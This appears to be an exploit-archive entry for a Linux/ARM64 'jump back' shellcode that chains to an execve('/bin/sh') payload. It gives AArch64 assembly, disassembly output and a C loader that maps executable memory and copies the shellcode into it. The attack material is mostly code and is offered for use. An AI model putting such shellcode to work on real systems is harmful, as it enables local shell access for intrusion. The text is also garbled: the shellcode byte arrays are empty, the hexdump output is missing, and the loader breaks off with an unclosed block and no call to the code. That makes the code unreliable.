Linux/ARM64 - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (8 Bytes)

ID: 101659
CVE: None
Download vulnerable application: None
# Title:  
# Date:   2019-06-30
# Tested: Ubuntu 16.04 (aarch64)
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c

[email protected]:~/works$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu Xenial Xerus (development branch)
Release:	16.04
Codename:	xenial
[email protected]:~/works$ uname -a
Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
[email protected]:~/works$ cat jumpback.s
.section .text
.global _start
    // Jump back to _start-0x30
    adr  x10, .-0x30    // x10 = _start-0x30
    br   x10            // Jump to _start-0x30
[email protected]:~/works$ as -o jumpback.o jumpback.s && ld -o jumpback jumpback.o
[email protected]:~/works$ objdump -d ./jumpback

./jumpback:     file format elf64-littleaarch64

Disassembly of section .text:

0000000000400078 <_start>:
  400078:	10fffe8a 	adr	x10, 400048 <_start-0x30>
  40007c:	d61f0140 	br	x10
[email protected]:~/works$ objcopy -O binary jumpback jumpback.bin
[email protected]:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' jumpback.bin && echo


#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

// Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
char shell[] =

char jumpback[] =

int main(int argc, char **argv) {
    printf("Shellcode Length: %zd Bytes\n", strlen(jumpback));

    void *ptr1 = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
    void *ptr2;

    if (ptr1 == MAP_FAILED) {

    ptr2 = ptr1 + 0x30;

    memcpy(ptr1, shell, sizeof(shell));
    memcpy(ptr2, jumpback, sizeof(jumpback));

    sc = ptr2;


    return 0;
1.3.0 (www01)